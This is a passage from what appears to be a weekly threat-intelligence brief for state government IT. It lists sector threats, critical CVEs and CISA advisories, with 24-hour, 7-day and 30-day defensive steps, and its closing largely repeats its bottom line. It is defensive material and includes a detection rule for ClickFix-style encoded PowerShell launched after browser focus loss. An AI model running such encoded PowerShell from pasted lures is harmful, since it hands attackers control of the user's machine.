<ul> <li><strong>Primary threat:</strong> Iranian espionage campaign explicitly targeting energy and utilities sectors; China-nexus compromised edge devices at remote energy monitoring sites.</li> <li><strong>Action:</strong> Audit all SOHO routers and edge devices at remote energy monitoring locations against the CISA AA26-113a device list. Verify segmentation between IT and OT/SCADA networks. Review remote access pathways used by third-party energy contractors.</li> <li><strong>Key ATT&CK:</strong> T1071 (Application Layer Protocol) — monitor for unusual outbound traffic from OT-adjacent network segments.</li>
</ul>
<h3><strong>Healthcare (Medicaid, State Health Departments, Public Health Labs)</strong></h3>
<ul> <li><strong>Primary threat:</strong> Ransomware via HOOK SPIDER access brokering — healthcare data commands premium prices on criminal markets. Ivanti EPMM vulnerabilities affect mobile devices used by field health workers.</li> <li><strong>Action:</strong> Patch Ivanti EPMM immediately (CVE-2026-1340, CVE-2026-1281, both CVSS 9.8). Review mobile device enrollment policies — unauthenticated API access to MDM platforms could allow adversary device enrollment. Ensure Medicaid PII databases have row-level access logging enabled.</li> <li><strong>Key CVE:</strong> CVE-2026-1340 and CVE-2026-1281 (Ivanti EPMM) — critical for any agency managing mobile health worker devices.</li>
</ul>
<h3><strong>Government (All State Agencies, Courts, Legislature)</strong></h3>
<ul> <li><strong>Primary threat:</strong> Multi-vector — FIRESTARTER espionage backdoor, ClickFix social engineering delivering NETSUPPORT RAT, HOOK SPIDER selling government network access, and GopherWhisper abusing M365 for C2.</li> <li><strong>Action:</strong> Prioritize BlueHammer (CVE-2026-33825) patching ahead of the May 7 KEV deadline — Microsoft Defender is deployed on virtually every state endpoint. Implement PowerShell Constrained Language Mode on standard user workstations to mitigate ClickFix attacks. Audit Azure AD for OAuth applications with excessive permissions (Graph API mail read/write scopes granted to unknown apps).</li> <li><strong>Key deadline:</strong> <strong>7 May 2026 — CISA KEV mandatory remediation for BlueHammer.</strong></li>
</ul>
<h3><strong>Aviation / Logistics (State DOT, Airports, Port Authorities)</strong></h3>
<ul> <li><strong>Primary threat:</strong> China-nexus compromised network devices at transportation management centers and remote DOT facilities; supply chain compromise via MSPs managing traffic management and logistics systems.</li> <li><strong>Action:</strong> Inventory all network edge devices at traffic management centers, weigh stations, and remote DOT sites against CISA AA26-113a advisory. Review MSP access controls — ensure MSP VPN accounts use MFA and are scoped to minimum necessary access. Monitor for anomalous data flows from transportation SCADA systems.</li> <li><strong>Key ATT&CK:</strong> T1199 (Trusted Relationship) — MSP compromise is the primary initial access vector for transportation infrastructure.</li>
</ul>
<h2><strong>Prioritized Defense Recommendations</strong></h2>
<h3><strong>🔴 IMMEDIATE (Within 24 Hours)</strong></h3>
<ol> <li><strong>IT Ops + 911 Authority:</strong> Contact the state’s 911/PSAP authority and verify patch status for <strong>Intrado 911 Emergency Gateway</strong> systems per CISA advisory ICSA-26-113-06. This is a life-safety system — CIO-level communication to the relevant public safety agency is warranted today.</li> <li><strong>SOC:</strong> Download the full CISA <strong>FIRESTARTER</strong> Malware Analysis Report (AR26-113A) from cisa.gov. Extract all IOCs (hashes, IPs, domains) and ingest into SIEM and EDR platforms for retroactive hunting across all state network endpoints.</li> <li><strong>SOC:</strong> Verify compliance with both CISA KEV additions from April 22–23. Confirm patches are deployed or mitigations are in place within BOD 22-01 timelines.</li> <li><strong>IT Ops:</strong> Confirm <strong>BlueHammer (CVE-2026-33825)</strong> patch deployment status across all state endpoints. The CISA KEV mandatory remediation deadline is <strong>May 7, 2026</strong> — with confirmed in-the-wild exploitation since April 16, this cannot wait.</li>
</ol>
<h3><strong>🟡 7-DAY</strong></h3>
<ol> <li><strong>IAM / Identity Team:</strong> Audit Azure AD conditional access policies to restrict or block <strong>device-code authentication flows</strong>. Block legacy authentication protocols that enable OAuth device-code phishing. Review all OAuth application grants for excessive Graph API permissions (especially Mail.ReadWrite, Files.ReadWrite.All).</li> <li><strong>SOC / Detection Engineering:</strong> Deploy detection for <strong>ClickFix-style attacks</strong> — alert on powershell.exe with -encodedcommand spawned within 5 seconds of browser process focus loss. Enable PowerShell Script Block Logging (Event ID 4104) on all endpoints if not already active.</li> <li><strong>Security Architecture:</strong> Review DLP policies for <strong>cloud storage exfiltration</strong> (OneDrive, Google Drive, Mega, Dropbox). CoinbaseCartel’s exfiltration-only model means no ransomware detonation alert will fire — detection depends entirely on DLP and UEBA. Ensure CASB is monitoring for bulk file downloads.</li> <li><strong>IT Ops:</strong> Patch <strong>Ivanti EPMM</strong> (CVE-2026-1340 and CVE-2026-1281, both CVSS 9.8) and <strong>BeyondTrust Remote Support/PRA</strong> (CVE-2026-1731, CVSS 9.8). Both have active exploitation campaigns confirmed.</li> <li><strong>Network Security:</strong> Audit all SOHO routers and edge network devices at agency branch offices and remote sites against the device types listed in <strong>CISA/Five Eyes advisory AA26-113a</strong>. Replace or isolate compromised device models.</li>
</ol>
<h3><strong>🔵 30-DAY</strong></h3>
<ol> <li><strong>CISO:</strong> Commission a security assessment of state <strong>911/PSAP infrastructure</strong> including Intrado EGW, Computer-Aided Dispatch (CAD) systems, and NG911 components. Coordinate with state emergency management. This infrastructure may not appear in standard IT asset inventories.</li> <li><strong>CISO:</strong> Initiate a proactive threat hunt for <strong>APT29</strong> indicators against state election infrastructure ahead of the 2026 midterm cycle. Coordinate with the Election Assistance Commission (EAC) and CISA Election Security. The current absence of APT29 activity against state targets should not be interpreted as safety.</li> <li><strong>CISO / IR Team:</strong> Conduct a tabletop exercise simulating a <strong>HOOK SPIDER access sale → ransomware deployment</strong> scenario against a state agency. Test incident response procedures, backup restoration timelines, and communication plans. HOOK SPIDER’s confirmed relationships with SCATTERED SPIDER, Nova RaaS, and other ransomware operators make this a realistic near-term scenario.</li> <li><strong>Security Architecture:</strong> Implement <strong>PowerShell Constrained Language Mode</strong> on standard user workstations across all agencies to reduce the effectiveness of ClickFix and similar social engineering techniques that rely on user-executed PowerShell.</li> <li><strong>CISO / Governance:</strong> Establish a weekly manual review of <strong>NASCIO, NCSL Cybersecurity Legislation Tracker, and congress.gov</strong> for state-relevant cybersecurity legislation and federal cyber funding developments. Automated feeds have not reliably captured legislative intelligence — this requires a human-in-the-loop process.</li>
</ol>
<h2><strong>Bottom Line</strong></h2>
<p>State government IT faces a convergence of threats this week that is broader and more technically sophisticated than any single advisory conveys. China-nexus actors are running simultaneous espionage operations through compromised edge devices, M365 API abuse, and a newly disclosed backdoor — all targeting the exact technology stack state agencies depend on. Iranian actors are expanding government targeting globally. Access brokers are explicitly advertising state and local government network access to ransomware operators. A vulnerability in 911 dispatch infrastructure introduces a life-safety dimension that demands immediate executive attention.</p>
<p>Every threat in this report has a concrete defensive action available today. The BlueHammer patch deadline is May 7. The Ivanti and BeyondTrust patches are available now. The FIRESTARTER IOCs can be hunted today. The 911 authority can be called this morning. State agencies are being targeted — the question is whether the patches get deployed, the hunts get run, and the calls get made before the next advisory is about your network.</p>
<h2><strong>Closing</strong></h2>
<p>The threat landscape facing state government IT this week is defined by convergence. China-nexus actors are running parallel espionage operations through compromised edge devices, M365 API abuse, and newly disclosed backdoors — all targeting the exact technology stack state agencies depend on. Iranian actors are expanding government targeting globally. Access brokers are explicitly advertising state and local government network access to ransomware operators. And a vulnerability in 911 dispatch infrastructure introduces a life-safety dimension that demands immediate executive attention.</p>
<p>The common thread across all of these threats is that they exploit the gaps state governments know they have: legacy edge devices at remote offices, under-monitored cloud environments, mobile device management platforms that haven’t been patched, and critical infrastructure systems that don’t appear in IT asset inventories.</p>
<p>The good news is that every threat identified in this report has a concrete defensive action. The BlueHammer patch deadline is May 7. The Ivanti and BeyondTrust patches are available now. The FIRESTARTER IOCs can be hunted today. The 911 authority can be called this morning.</p>
<p>The question is not whether state agencies are being targeted. They are. The question is whether the patches get deployed, the hunts get run, and the calls get made before the next advisory is about your network.</p>